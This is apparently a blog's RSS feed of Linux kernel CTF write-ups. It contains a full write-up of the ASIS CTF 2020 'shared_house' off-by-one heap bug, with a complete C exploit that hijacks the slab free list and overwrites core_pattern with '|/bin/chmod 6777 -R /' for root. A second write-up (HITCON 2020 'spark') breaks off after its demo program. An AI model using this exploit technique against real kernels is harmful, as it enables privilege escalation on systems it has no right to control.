/tags/uaf/ Recent content in UAF on Uniguri's Blog Hugo -- gohugo.io en-us Thu, 27 Feb 2025 12:17:57 +0000 /posts/kernel/write-ups/ctf/asisctf2020qual-shared_house/ Thu, 27 Feb 2025 12:17:57 +0000 /posts/kernel/write-ups/ctf/asisctf2020qual-shared_house/ <hr> <h2 id="problem">Problem</h2> <h3 id="enviroment">Enviroment</h3> <ul> <li>linux version: <a href="https://elixir.bootlin.com/linux/v4.19.98/source"><code>4.19.98</code></a> <ul> <li>No SMAP</li> <li>No KPTI</li> </ul> </li> </ul> <h3 id="features">Features</h3> <p>This challenge provide simple device (it has only one function: <code>mod_ioctl</code>). And the function is like following:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#66d9ef">struct</span> <span style="color:#66d9ef">request_t</span> </span></span><span style="display:flex;"><span>{ </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">int</span> size; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">char</span> __padding0[<span style="color:#ae81ff">4</span>]; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">void</span> <span style="color:#f92672">*</span>data; </span></span><span style="display:flex;"><span>}; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>uint64_6 <span style="color:#a6e22e">mod_ioctl</span>(<span style="color:#66d9ef">struct</span> file <span style="color:#f92672">*</span>a1, <span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">int</span> cmd, <span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">__int64</span> arg) { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">struct</span> <span style="color:#66d9ef">request_t</span> req; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">copy_from_user</span>(<span style="color:#f92672">&amp;</span>req, arg, <span style="color:#ae81ff">0x10LL</span>)) <span style="color:#66d9ef">return</span> <span style="color:#f92672">-</span><span style="color:#ae81ff">14LL</span>; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (req.size <span style="color:#f92672">&gt;</span> <span style="color:#ae81ff">0x80</span>) <span style="color:#66d9ef">return</span> <span style="color:#f92672">-</span><span style="color:#ae81ff">22LL</span>; </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">mutex_lock</span>(<span style="color:#f92672">&amp;</span>_mutex); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (cmd <span style="color:#f92672">==</span> <span style="color:#ae81ff">0xC12ED002</span>) { <span style="color:#75715e">// cmd == 0xC12ED002: delete_note </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span> <span style="color:#66d9ef">if</span> (<span style="color:#f92672">!</span>note) { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">goto</span> ERROR; </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">kfree</span>(note); </span></span><span style="display:flex;"><span> note <span style="color:#f92672">=</span> <span style="color:#ae81ff">0LL</span>; </span></span><span style="display:flex;"><span> } <span style="color:#66d9ef">else</span> <span style="color:#66d9ef">if</span> (cmd <span style="color:#f92672">==</span> <span style="color:#ae81ff">0xC12ED001</span>) { <span style="color:#75715e">// cmd == 0xC12ED001: alloc_new_note </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span> <span style="color:#66d9ef">if</span> (note) <span style="color:#a6e22e">kfree</span>(note); </span></span><span style="display:flex;"><span> size <span style="color:#f92672">=</span> req.size; </span></span><span style="display:flex;"><span> note <span style="color:#f92672">=</span> (<span style="color:#66d9ef">char</span> <span style="color:#f92672">*</span>)<span style="color:#a6e22e">_kmalloc</span>(req.size, <span style="color:#ae81ff">0x6080C0LL</span>); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (<span style="color:#f92672">!</span>note) <span style="color:#66d9ef">goto</span> ERROR; </span></span><span style="display:flex;"><span> } <span style="color:#66d9ef">else</span> <span style="color:#66d9ef">if</span> (cmd <span style="color:#f92672">==</span> <span style="color:#ae81ff">0xC12ED003</span>) { <span style="color:#75715e">// cmd == 0xC12ED003: write_note </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span> <span style="color:#66d9ef">if</span> (<span style="color:#f92672">!</span>note <span style="color:#f92672">||</span> req.size <span style="color:#f92672">&gt;</span> size <span style="color:#f92672">||</span> <span style="color:#a6e22e">copy_from_user</span>(note, req.data, req.size)) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">goto</span> ERROR; </span></span><span style="display:flex;"><span> note[req.size] <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>; <span style="color:#75715e">// off-by-one if req.size==size </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span> } <span style="color:#66d9ef">else</span> <span style="color:#66d9ef">if</span> (cmd <span style="color:#f92672">!=</span> <span style="color:#ae81ff">0xC12ED004</span> <span style="color:#f92672">||</span> <span style="color:#f92672">!</span>note <span style="color:#f92672">||</span> req.size <span style="color:#f92672">&gt;</span> size <span style="color:#f92672">||</span> </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">copy_to_user</span>(req.data, note, </span></span><span style="display:flex;"><span> req.size)) { <span style="color:#75715e">// cmd == 0xC12ED004: read_note </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span> <span style="color:#66d9ef">goto</span> ERROR; </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">mutex_unlock</span>(<span style="color:#f92672">&amp;</span>_mutex); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> <span style="color:#ae81ff">0LL</span>; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>ERROR: </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">mutex_unlock</span>(<span style="color:#f92672">&amp;</span>_mutex); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> <span style="color:#f92672">-</span><span style="color:#ae81ff">22</span>; </span></span><span style="display:flex;"><span>} </span></span></code></pre></div><h2 id="vulnerability">Vulnerability</h2> <p>The vulnerability is obvious. The <a href="https://en.wikipedia.org/wiki/Off-by-one_error">off-by-one</a> in write_note.</p> <hr> <h2 id="problem">Problem</h2> <h3 id="enviroment">Enviroment</h3> <ul> <li>linux version: <a href="https://elixir.bootlin.com/linux/v4.19.98/source"><code>4.19.98</code></a> <ul> <li>No SMAP</li> <li>No KPTI</li> </ul> </li> </ul> <h3 id="features">Features</h3> <p>This challenge provide simple device (it has only one function: <code>mod_ioctl</code>). And the function is like following:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#66d9ef">struct</span> <span style="color:#66d9ef">request_t</span> </span></span><span style="display:flex;"><span>{ </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">int</span> size; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">char</span> __padding0[<span style="color:#ae81ff">4</span>]; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">void</span> <span style="color:#f92672">*</span>data; </span></span><span style="display:flex;"><span>}; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>uint64_6 <span style="color:#a6e22e">mod_ioctl</span>(<span style="color:#66d9ef">struct</span> file <span style="color:#f92672">*</span>a1, <span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">int</span> cmd, <span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">__int64</span> arg) { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">struct</span> <span style="color:#66d9ef">request_t</span> req; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">copy_from_user</span>(<span style="color:#f92672">&amp;</span>req, arg, <span style="color:#ae81ff">0x10LL</span>)) <span style="color:#66d9ef">return</span> <span style="color:#f92672">-</span><span style="color:#ae81ff">14LL</span>; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (req.size <span style="color:#f92672">&gt;</span> <span style="color:#ae81ff">0x80</span>) <span style="color:#66d9ef">return</span> <span style="color:#f92672">-</span><span style="color:#ae81ff">22LL</span>; </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">mutex_lock</span>(<span style="color:#f92672">&amp;</span>_mutex); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (cmd <span style="color:#f92672">==</span> <span style="color:#ae81ff">0xC12ED002</span>) { <span style="color:#75715e">// cmd == 0xC12ED002: delete_note </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span> <span style="color:#66d9ef">if</span> (<span style="color:#f92672">!</span>note) { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">goto</span> ERROR; </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">kfree</span>(note); </span></span><span style="display:flex;"><span> note <span style="color:#f92672">=</span> <span style="color:#ae81ff">0LL</span>; </span></span><span style="display:flex;"><span> } <span style="color:#66d9ef">else</span> <span style="color:#66d9ef">if</span> (cmd <span style="color:#f92672">==</span> <span style="color:#ae81ff">0xC12ED001</span>) { <span style="color:#75715e">// cmd == 0xC12ED001: alloc_new_note </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span> <span style="color:#66d9ef">if</span> (note) <span style="color:#a6e22e">kfree</span>(note); </span></span><span style="display:flex;"><span> size <span style="color:#f92672">=</span> req.size; </span></span><span style="display:flex;"><span> note <span style="color:#f92672">=</span> (<span style="color:#66d9ef">char</span> <span style="color:#f92672">*</span>)<span style="color:#a6e22e">_kmalloc</span>(req.size, <span style="color:#ae81ff">0x6080C0LL</span>); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (<span style="color:#f92672">!</span>note) <span style="color:#66d9ef">goto</span> ERROR; </span></span><span style="display:flex;"><span> } <span style="color:#66d9ef">else</span> <span style="color:#66d9ef">if</span> (cmd <span style="color:#f92672">==</span> <span style="color:#ae81ff">0xC12ED003</span>) { <span style="color:#75715e">// cmd == 0xC12ED003: write_note </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span> <span style="color:#66d9ef">if</span> (<span style="color:#f92672">!</span>note <span style="color:#f92672">||</span> req.size <span style="color:#f92672">&gt;</span> size <span style="color:#f92672">||</span> <span style="color:#a6e22e">copy_from_user</span>(note, req.data, req.size)) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">goto</span> ERROR; </span></span><span style="display:flex;"><span> note[req.size] <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>; <span style="color:#75715e">// off-by-one if req.size==size </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span> } <span style="color:#66d9ef">else</span> <span style="color:#66d9ef">if</span> (cmd <span style="color:#f92672">!=</span> <span style="color:#ae81ff">0xC12ED004</span> <span style="color:#f92672">||</span> <span style="color:#f92672">!</span>note <span style="color:#f92672">||</span> req.size <span style="color:#f92672">&gt;</span> size <span style="color:#f92672">||</span> </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">copy_to_user</span>(req.data, note, </span></span><span style="display:flex;"><span> req.size)) { <span style="color:#75715e">// cmd == 0xC12ED004: read_note </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span> <span style="color:#66d9ef">goto</span> ERROR; </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">mutex_unlock</span>(<span style="color:#f92672">&amp;</span>_mutex); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> <span style="color:#ae81ff">0LL</span>; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>ERROR: </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">mutex_unlock</span>(<span style="color:#f92672">&amp;</span>_mutex); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> <span style="color:#f92672">-</span><span style="color:#ae81ff">22</span>; </span></span><span style="display:flex;"><span>} </span></span></code></pre></div><h2 id="vulnerability">Vulnerability</h2> <p>The vulnerability is obvious. The <a href="https://en.wikipedia.org/wiki/Off-by-one_error">off-by-one</a> in write_note.</p> <h2 id="exploit">Exploit</h2> <p>Since the off-by-one occurs in heap chunk, I decide to use <a href="https://elixir.bootlin.com/linux/v4.19.98/source/include/linux/msg.h#L9"><code>struct msg_msg</code></a> and free list. Unlike The free list is in middle and stored protected in latest kernel, it is in front and stored raw in the provided kernel.</p> <h3 id="trigger-off-by-one">Trigger off-by-one</h3> <p>Triggering off-by-one is simple:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#a6e22e">vuln_dev_alloc_new_note</span>(<span style="color:#ae81ff">0x20</span>); </span></span><span style="display:flex;"><span><span style="color:#a6e22e">vuln_dev_write_note</span>(buf, <span style="color:#ae81ff">0x20</span>); <span style="color:#75715e">// Trigger off-by-one </span></span></span></code></pre></div><h3 id="get-controlleduaf-msg_msg-chunk">Get controlled(UAF) msg_msg chunk</h3> <p>In <code>struct msg_msg</code>, the <code>m_list.next</code> and <code>m_list.prev</code> exist. And they are connected with other messages by using double linked list.</p> <p>Because we can overwrite 1 byte after our <code>note</code>, we can overwrite LSB of <code>m_list.next</code> if the message is located after our <code>note</code>. My plain is &ldquo;making dangling pointer in <code>m_list</code> to free-ed message and make the free-ed chunk become our note.</p> <p>For example, initial messages (consider all messages locate consequently):</p> <pre class="mermaid"> graph LR A[msg 1] --&gt;|next| B A --&gt;|prev| E B[msg 2] --&gt;|next| C B --&gt;|prev| A C[msg 3] --&gt;|next| D C --&gt;|prev| B D[msg 4] --&gt;|next| E D --&gt;|prev| C E[msg 5] --&gt;|next| F E --&gt;|prev| D F[msg 6] --&gt;|next| A F --&gt;|prev| E </pre> <p>And free middle message (msg 2) via <a href="https://elixir.bootlin.com/linux/v6.13.4/source/ipc/msg.c#L1098"><code>do_msgrcv</code></a> and allocate it as our note:</p> <pre class="mermaid"> graph LR A[msg 1] --&gt;|next| C A --&gt;|prev| E B[msg 2 = our note] C[msg 3] --&gt;|next| D C --&gt;|prev| A D[msg 4] --&gt;|next| E D --&gt;|prev| C E[msg 5] --&gt;|next| F E --&gt;|prev| D F[msg 6] --&gt;|next| A F --&gt;|prev| E </pre> <p>Make invalid <code>m_list.next</code> via triggering off-by-one:</p> <pre class="mermaid"> graph LR A[msg 1] --&gt;|next| C A --&gt;|prev| E B[msg 2 = our note] C[msg 3; next is corrupted] --&gt;|next| E C --&gt;|prev| A D[msg 4] --&gt;|next| E D --&gt;|prev| C E[msg 5] --&gt;|next| F E --&gt;|prev| D F[msg 6] --&gt;|next| A F --&gt;|prev| E </pre> <p>With this connections, the <a href="https://elixir.bootlin.com/linux/v6.13.4/source/ipc/msg.c#L1163">unlink</a> of <code>msg 5</code> and <a href="https://elixir.bootlin.com/linux/v6.13.4/source/ipc/msg.c#L1259"><code>free_msg</code></a> to it make dangling pointer to <code>msg 5</code> in <code>msg 3</code>.</p> <p>After freeing <code>msg 5</code>, the allocated note will be have same address with <code>msg 5</code>. Then we can make <code>limited_aar</code> using <code>next</code> in <code>struct msg_msg</code>. The disadventage of <code>limited_aar</code> is 1. the first 8 bytes must be zeros (because of <a href="https://elixir.bootlin.com/linux/v6.13.4/source/ipc/msgutil.c#L161"><code>store_msg</code></a>) 2. the read address will be freed (because of <a href="https://elixir.bootlin.com/linux/v6.13.4/source/ipc/msgutil.c#L180"><code>free_msg</code></a>).</p> <p>But we can leak the address of <code>msg 5</code>(UAF chunk) and kernel base only with <code>limited_arr</code>.</p> <h3 id="overwrite-free-list-and-allocate-arbitrary-address-via-kmalloc">Overwrite free list and allocate arbitrary address via <code>kmalloc</code></h3> <p>Okay, now we can allocate arbitrary address by modifying free list in free-ed chunk. Currently the <code>note</code> (this is same as <code>msg 5</code>) is freed and thus it has pointer to next free-ed chunk. So overwriting it with <code>core_pattern</code> address, allocating serveral chunks and ETC give us the <code>core_pattern</code> as <code>note</code>.</p> <h3 id="code">Code</h3> <div class="collapsable-code"> <input id="295763184" type="checkbox" checked /> <label for="295763184"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">AsisCTF2020Qual-shared_house-exploit.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#include &lt;fcntl.h&gt; #include &lt;poll.h&gt; #include &lt;pthread.h&gt; #include &lt;stddef.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; #include &lt;sys/ioctl.h&gt; #include &lt;sys/ipc.h&gt; #include &lt;sys/mman.h&gt; #include &lt;sys/msg.h&gt; #include &lt;sys/syscall.h&gt; #include &lt;sys/types.h&gt; #include &lt;unistd.h&gt; #define KERNEL_BASE_START 0xffffffff81000000 #define KERNEL_BASE_END 0xffffffffc0000000 #define KERNEL_BASE_MASK (~0x00000000000fffff) #define IS_IN_KERNEL_RANGE(addr) \ ((addr) &gt;= KERNEL_BASE_START &amp;&amp; (addr) &lt;= KERNEL_BASE_END) #define MOD_PROBE_OFFSET (0xffffffff81c2c540 - KERNEL_BASE_START) #define CORE_PATTERN_OFFSET (0xffffffff81c36c80 - KERNEL_BASE_START) static void get_enter_to_continue(const char* msg); static void fatal(const char* msg); void get_enter_to_continue(const char* msg) { puts(msg); getchar(); } void fatal(const char* msg) { perror(msg); // get_enter_to_continue(&#34;Press enter to exit...&#34;); exit(-1); } struct msg_msgseg { struct msg_msgseg* next; char data[0]; }; struct msg_msg { struct msg_msg *next, *prev; long m_type; size_t m_ts; struct msg_msgseg* next_data; void* security; char data[0]; }; struct msgbuf { long mtype; /* message type, must be &gt; 0 */ char mtext[1]; /* message data */ }; int send_msg(int msgqid, char* data, size_t size, long mtype, long mflag); int recv_msg(int msgqid, char* data, size_t size, long mtype, long mflag); int send_msg(int msgqid, char* data, size_t size, long mtype, long mflag) { struct msgbuf* m = malloc(sizeof(long) + size); int ret = -1; memcpy(m-&gt;mtext, data, size); m-&gt;mtype = mtype; ret = msgsnd(msgqid, m, size, mflag); free(m); return ret; } int recv_msg(int msgqid, char* data, size_t size, long mtype, long mflag) { struct msgbuf* m = malloc(sizeof(long) + size); int ret = -1; m-&gt;mtype = mtype; ret = msgrcv(msgqid, m, size, mtype, mflag); memcpy(data, m-&gt;mtext, size); free(m); return ret; } #define VULN_DEV_NAME &#34;/dev/note&#34; #define VULN_DEV_CONST_MAX_SIZE 0x80 #define VULN_DEV_CMD_ALLOC_NEW_NOTE 0xC12ED001 #define VULN_DEV_CMD_DELTE_NOTE 0xC12ED002 #define VULN_DEV_CMD_WRITE_NOTE 0xC12ED003 #define VULN_DEV_CMD_READ_NOTE 0xC12ED004 typedef struct request_t { unsigned int size; char __padding[4]; uint64_t data; } request_t; static int vuln_dev_alloc_new_note(unsigned int size); static int vuln_dev_delete_note(); static int vuln_dev_write_note(const void* data, unsigned int size); static int vuln_dev_read_note(void* data, unsigned int size); int vuln_fd = 0; static int vuln_dev_alloc_new_note(unsigned int size) { request_t req = {.size = size}; return ioctl(vuln_fd, VULN_DEV_CMD_ALLOC_NEW_NOTE, &amp;req); } static int vuln_dev_delete_note() { request_t req = {.size = 0}; return ioctl(vuln_fd, VULN_DEV_CMD_ALLOC_NEW_NOTE, &amp;req); } static int vuln_dev_write_note(const void* data, unsigned int size) { request_t req = {.data = (uint64_t)data, .size = size}; return ioctl(vuln_fd, VULN_DEV_CMD_WRITE_NOTE, &amp;req); } static int vuln_dev_read_note(void* data, unsigned int size) { request_t req = {.data = (uint64_t)data, .size = size}; return ioctl(vuln_fd, VULN_DEV_CMD_READ_NOTE, &amp;req); } int target_obj_size = 0; int msgqid = 0; void* fake_msgmsg = NULL; int uaf_msgmsg_mtype = 0; static int make_uaf_msgmsg(char* temp_buf) { char* buf = temp_buf; buf[target_obj_size - 1] = 0; for (int i = 0; i &lt; 0x10; ++i) { memset(buf, i, target_obj_size - 0x30); send_msg(msgqid, buf, target_obj_size - 0x30, 0x10 - i, 0); } recv_msg(msgqid, buf, target_obj_size - 0x30, 0, 0); vuln_dev_alloc_new_note(target_obj_size); memset(buf, 0, target_obj_size); vuln_dev_write_note(buf, target_obj_size); // Trigger off-by-one vuln_dev_delete_note(); for (int i = 0; i &lt; 0x10; ++i) { memset(buf, 0, target_obj_size); vuln_dev_delete_note(); int t = recv_msg(msgqid, buf, target_obj_size, -(i + 1), 0); if (*buf == &#39;A&#39;) { return -(i + 1); } else if (i == 0x10 - 1) { fatal(&#34;[-] Failed to find UAF msg_msg&#34;); } vuln_dev_alloc_new_note(target_obj_size); memset(buf, 0, target_obj_size); struct msg_msg* fake_msg = (struct msg_msg*)buf; fake_msg-&gt;next = (struct msg_msg*)fake_msg; fake_msg-&gt;prev = (struct msg_msg*)fake_msg; fake_msg-&gt;m_type = 1; fake_msg-&gt;m_ts = target_obj_size; memset(fake_msg-&gt;data, &#39;A&#39;, 1); vuln_dev_write_note(buf, target_obj_size); } return 1; } /// @brief Limited AAR primitive. The 8 bytes before target address must be /// zeros. /// @param out_data: output buffer /// @param addr: target address /// @param size: size of output buffer. size must be less than or equal to /// (0x1000-0x10) /// @return positive on success, -1 on failure static int limited_aar(char* out_data, uint64_t addr, uint64_t size) { int ret; char* buf[target_obj_size]; memset(buf, 0, sizeof(buf)); struct msg_msg* uaf_msg = (struct msg_msg*)buf; uaf_msg-&gt;next = (struct msg_msg*)fake_msgmsg; uaf_msg-&gt;prev = (struct msg_msg*)fake_msgmsg; uaf_msg-&gt;m_type = 1; uaf_msg-&gt;m_ts = 0x1000 - offsetof(struct msg_msg, data) + size; uaf_msg-&gt;next_data = (struct msg_msgseg*)(addr - 8); vuln_dev_write_note(buf, target_obj_size); char temp_buf[0x2000]; ret = recv_msg(msgqid, temp_buf, 0x2000, uaf_msgmsg_mtype, 0); memcpy(out_data, temp_buf + 0x1000 - offsetof(struct msg_msg, data), size - 8); } static int leak_uaf_chunk_addr_and_kernel_addr(uint64_t pre_uaf_msg_addr, char* temp_buf, uint64_t* out_uaf_chunk_addr, uint64_t* out_kernel_base) { char* buf[target_obj_size]; memset(buf, 0, sizeof(buf)); *out_uaf_chunk_addr = 0; *out_kernel_base = 0; limited_aar(temp_buf, pre_uaf_msg_addr, 0x1000 - offsetof(struct msg_msgseg, data)); vuln_dev_read_note(buf, target_obj_size); *out_uaf_chunk_addr = *(uint64_t*)buf; uint64_t* uint64_buf = (uint64_t*)temp_buf; for (int i = 0; i &lt; (0x2000 - offsetof(struct msg_msg, data) - offsetof(struct msg_msgseg, data)) / 8; ++i) { if (IS_IN_KERNEL_RANGE(uint64_buf[i])) { uint64_t min_addr = uint64_buf[i] &amp; KERNEL_BASE_MASK; if (*out_kernel_base == 0 || min_addr &lt; *out_kernel_base) { *out_kernel_base = min_addr; } } } if (*out_kernel_base == 0 || *out_uaf_chunk_addr == 0) { return -1; } return 0; } int main() { vuln_fd = open(VULN_DEV_NAME, O_RDONLY); if (vuln_fd &lt; 0) { fatal(&#34;open(&#34; VULN_DEV_NAME &#34;)&#34;); } target_obj_size = 0x80; char buf[target_obj_size]; uint64_t* uint64_buf = (uint64_t*)buf; memset(buf, 0, sizeof(buf)); msgqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT); if (msgqid &lt; 0) { fatal(&#34;msgget&#34;); } fake_msgmsg = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (fake_msgmsg == MAP_FAILED) { fatal(&#34;mmap&#34;); } printf(&#34;[*] fake_msgmsg: %p\n&#34;, fake_msgmsg); uaf_msgmsg_mtype = make_uaf_msgmsg(buf); if (uaf_msgmsg_mtype &gt; 0) { printf(&#34;[-] Failed to find UAF msg_msg\n&#34;); return -1; } uint64_t prev_uaf_msg = uint64_buf[88 / 8]; printf(&#34;[+] Found UAF msg_msg with mtype: %d\n&#34;, uaf_msgmsg_mtype); printf(&#34; [*] Now note is same as UAF msg_msg\n&#34;); printf(&#34; [*] The prev of UAF msg_msg is 0x%016lx\n&#34;, prev_uaf_msg); vuln_dev_alloc_new_note(target_obj_size); printf(&#34;[*] Leaking UAF chunk addr and kernel base...\n&#34;); char* temp_buf = malloc(0x2000); uint64_t uaf_chunk_addr, kernel_addr; if (leak_uaf_chunk_addr_and_kernel_addr(prev_uaf_msg, temp_buf, &amp;uaf_chunk_addr, &amp;kernel_addr) &lt; 0) { printf(&#34; [-] Failed to leak uaf chunk addr and kernel base\n&#34;); return -1; } printf(&#34; [+] Found UAF chunk address: 0x%016lx\n&#34;, uaf_chunk_addr); printf(&#34; [+] Found kernel address: 0x%016lx\n&#34;, kernel_addr); printf(&#34;[*] Overwrite free list to overwrite modprobe_path\n&#34;); int msgqid2 = msgget(IPC_PRIVATE, 0644 | IPC_CREAT); if (msgqid2 &lt; 0) { fatal(&#34;msgget&#34;); } uint64_t next_free_chunk = kernel_addr + CORE_PATTERN_OFFSET - 8; printf(&#34; [*] Overwriting free list at 0x%016lx to 0x%016lx\n&#34;, uaf_chunk_addr, next_free_chunk); vuln_dev_write_note(&amp;next_free_chunk, 8); printf(&#34; [*] Consume chunks in free list&#34;); send_msg(msgqid2, temp_buf, 0x80 - offsetof(struct msg_msg, data), 0x10, 0); send_msg(msgqid2, temp_buf, 0x80 - offsetof(struct msg_msg, data), 0x11, 0); vuln_dev_delete_note(); send_msg(msgqid2, temp_buf, 0x80 - offsetof(struct msg_msg, data), 0x12, 0); printf(&#34; [*] Now allocate note with addr=0x%016lx\n&#34;, next_free_chunk); vuln_dev_alloc_new_note(0x80); char new_core_pattern[] = &#34;|/bin/chmod 6777 -R /&#34;; memset(temp_buf, 0, 0x2000); strcpy(temp_buf + 8, new_core_pattern); printf(&#34;[*] Overwrite core_pattern to \&#34;%s\&#34;\n&#34;, new_core_pattern); vuln_dev_write_note(temp_buf, 8 + sizeof(new_core_pattern)); { int fd = open(&#34;/proc/sys/kernel/core_pattern&#34;, O_RDONLY); char core[0x100]; read(fd, core, sizeof(core)); if (memcmp(core, new_core_pattern, sizeof(new_core_pattern) - 1) != 0) { printf(&#34; [-] Failed to overwrite core_pattern (core_pattern=\&#34;%s\&#34;)\n&#34;, core); return -1; } } printf(&#34; [+] Successfully overwrite core_pattern\n&#34;); printf(&#34;[*] Trigger core_pattern\n&#34;); uint64_t* evil = (uint64_t*)0xdeadbeef; *evil = 0; close(vuln_fd); return 0; }</code></pre></div> <h2 id="reference">Reference</h2> <ul> <li><a href="https://gitlab.com/sajjadium/ctf-archives/-/tree/main/ctfs/ASIS/2020/Quals/shared_house">https://gitlab.com/sajjadium/ctf-archives/-/tree/main/ctfs/ASIS/2020/Quals/shared_house</a></li> <li><a href="https://duasynt.com/blog/cve-2016-6187-heap-off-by-one-exploit">https://duasynt.com/blog/cve-2016-6187-heap-off-by-one-exploit</a></li> </ul> /posts/kernel/write-ups/ctf/hitcon2020-spark/ Tue, 18 Feb 2025 15:33:22 +0000 /posts/kernel/write-ups/ctf/hitcon2020-spark/ <hr> <h2 id="problem">Problem</h2> <h3 id="environment">Environment</h3> <ul> <li>linux version: <a href="https://elixir.bootlin.com/linux/v5.9.11/source"><code>5.9.11</code></a> <ul> <li>No SMAP</li> <li>No SMEP</li> <li>No KPTI</li> </ul> </li> </ul> <h3 id="module">Module</h3> <p>The source code of module is not provided, but the challenge gives us the demo program using it.</p> <div class="collapsable-code"> <input id="516873924" type="checkbox" checked /> <label for="516873924"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">HITCON2020-spark-demo.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>/* * This is a demo program to show how to interact with SPARK. * Don&#39;t waste time on finding bugs here ;) * * Copyright (c) 2020 david942j */ #include &lt;assert.h&gt; #include &lt;fcntl.h&gt; #include &lt;linux/spark.h&gt; #include &lt;stdio.h&gt; #include &lt;sys/ioctl.h&gt; #include &lt;sys/mman.h&gt; #include &lt;unistd.h&gt; #define DEV_PATH &#34;/dev/node&#34; #define N 6 static int fd[N]; const char l[] = &#34;ABCDEF&#34;; /* B -- 10 -- D -- 11 -- F / \ | 4 | | / | | A 5 4 \ | | 2 | | \ | | C -- 3 - E */ static void link(int a, int b, unsigned int weight) { printf(&#34;Creating link between &#39;%c&#39; and &#39;%c&#39; with weight %u\n&#34;, l[a], l[b], weight); assert(ioctl(fd[a], SPARK_LINK, fd[b] | ((unsigned long long)weight &lt;&lt; 32)) == 0); } static void query(int a, int b) { struct spark_ioctl_query qry = { .fd1 = fd[a], .fd2 = fd[b], }; assert(ioctl(fd[0], SPARK_QUERY, &amp;qry) == 0); printf(&#34;The length of shortest path between &#39;%c&#39; and &#39;%c&#39; is %lld\n&#34;, l[a], l[b], qry.distance); } int main(int argc, char *argv[]) { for (int i = 0; i &lt; N; i++) { fd[i] = open(DEV_PATH, O_RDONLY); assert(fd[i] &gt;= 0); } link(0, 1, 4); link(0, 2, 2); link(1, 2, 5); link(1, 3, 10); link(2, 4, 3); link(3, 4, 4); link(3, 5, 11); assert(ioctl(fd[0], SPARK_FINALIZE) == 0); query(0, 5); query(3, 2); query(2, 5); for (int i = 0; i &lt; N; i++) close(fd[i]); return 0; } </code></pre></div> <p>As we can see in <code>demo.c</code>, this module is for a shortest path search. And each node can be allocated by <code>open</code> and two nodes can be linked by <code>link</code>. The 